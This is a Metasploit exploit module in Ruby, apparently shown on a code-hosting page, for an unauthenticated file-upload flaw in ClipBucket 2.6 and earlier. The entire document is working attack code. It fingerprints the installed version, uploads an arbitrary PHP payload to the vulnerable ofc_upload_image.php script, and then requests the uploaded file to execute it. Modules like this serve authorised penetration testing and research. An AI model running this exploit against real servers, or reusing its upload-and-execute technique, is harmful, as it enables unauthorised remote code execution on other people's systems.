Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10
  include Msf::Exploit::FileDropper
11

12
  def initialize(info={})
13
    super(update_info(info,
14
      'Name'           => "ClipBucket Remote Code Execution",
15
      'Description'    => %q{
16
        This module exploits a vulnerability found in ClipBucket version 2.6 and lower.
17
        The script "/admin_area/charts/ofc-library/ofc_upload_image.php" can be used to
18
        upload arbitrary code without any authentication. This module has been tested
19
        on version 2.6 on CentOS 5.9 32-bit.
20
      },
21
      'License'         => MSF_LICENSE,
22
      'Author'          =>
23
        [
24
          'Gabby', # Vulnerability Discovery, PoC
25
          'xistence <xistence[at]0x90.nl>' # Metasploit module
26
        ],
27
      'References'      =>
28
        [
29
          [ 'PACKETSTORM', '123480' ]
30
        ],
31
      'Platform'        => ['php'],
32
      'Arch'            => ARCH_PHP,
33
      'Targets'         =>
34
        [
35
          ['Clipbucket 2.6', {}]
36
        ],
37
      'Privileged'      => false,
38
      'DisclosureDate'  => '2013-10-04',
39
      'DefaultTarget'   => 0))
40

41
    register_options(
42
      [
43
       OptString.new('TARGETURI', [true, 'The base path to the ClipBucket application', '/'])
44
      ])
45
  end
46

47
  def uri
48
    return target_uri.path
49
  end
50

51
  def check
52
    # Check version
53
    peer = "#{rhost}:#{rport}"
54

55
    vprint_status("Trying to detect installed version")
56

57
    res = send_request_cgi({
58
     'method' => 'GET',
59
     'uri'    => normalize_uri(uri, "")
60
    })
61

62
    if res and res.code == 200 and res.body =~ /ClipBucket version (\d+\.\d+)/
63
      version = $1
64
    else
65
      return Exploit::CheckCode::Unknown
66
    end
67

68
    vprint_status("Version #{version} detected")
69

70
    if version > "2.6"
71
      return Exploit::CheckCode::Safe
72
    else
73
      return Exploit::CheckCode::Appears
74
    end
75

76
    return Exploit::CheckCode::Safe
77
  end
78

79
  def exploit
80
    peer = "#{rhost}:#{rport}"
81
    payload_name = rand_text_alphanumeric(rand(10) + 5) + ".php"
82

83
    print_status("Uploading payload [ #{payload_name} ]")
84
    res = send_request_cgi({
85
      'method' => 'POST',
86
      'uri'    => normalize_uri(uri, "admin_area", "charts", "ofc-library", "ofc_upload_image.php"),
87
      'headers'  => { 'Content-Type' => 'text/plain' },
88
      'vars_get' => { 'name' => payload_name },
89
      'data'  => payload.encoded
90
    })
91

92
    # If the server returns 200 we assume we uploaded the malicious
93
    # file successfully
94
    if not res or res.code != 200 or res.body !~ /Saving your image to: \.\.\/tmp-upload-images\/(#{payload_name})/ or res.body =~ /HTTP_RAW_POST_DATA/
95
      fail_with(Failure::None, "#{peer} - File wasn't uploaded, aborting!")
96
    end
97

98
    register_files_for_cleanup(payload_name)
99

100
    print_status("Executing Payload [ #{uri}/admin_area/charts/tmp-upload-images/#{payload_name} ]" )
101
    res = send_request_cgi({
102
      'method' => 'GET',
103
      'uri'    => normalize_uri(uri, "admin_area", "charts", "tmp-upload-images", payload_name)
104
    })
105

106
    # If we don't get a 200 when we request our malicious payload, we suspect
107
    # we don't have a shell, either.
108
    if res and res.code != 200
109
      print_error("Unexpected response, probably the exploit failed")
110
    end
111

112
  end
113
end
114

115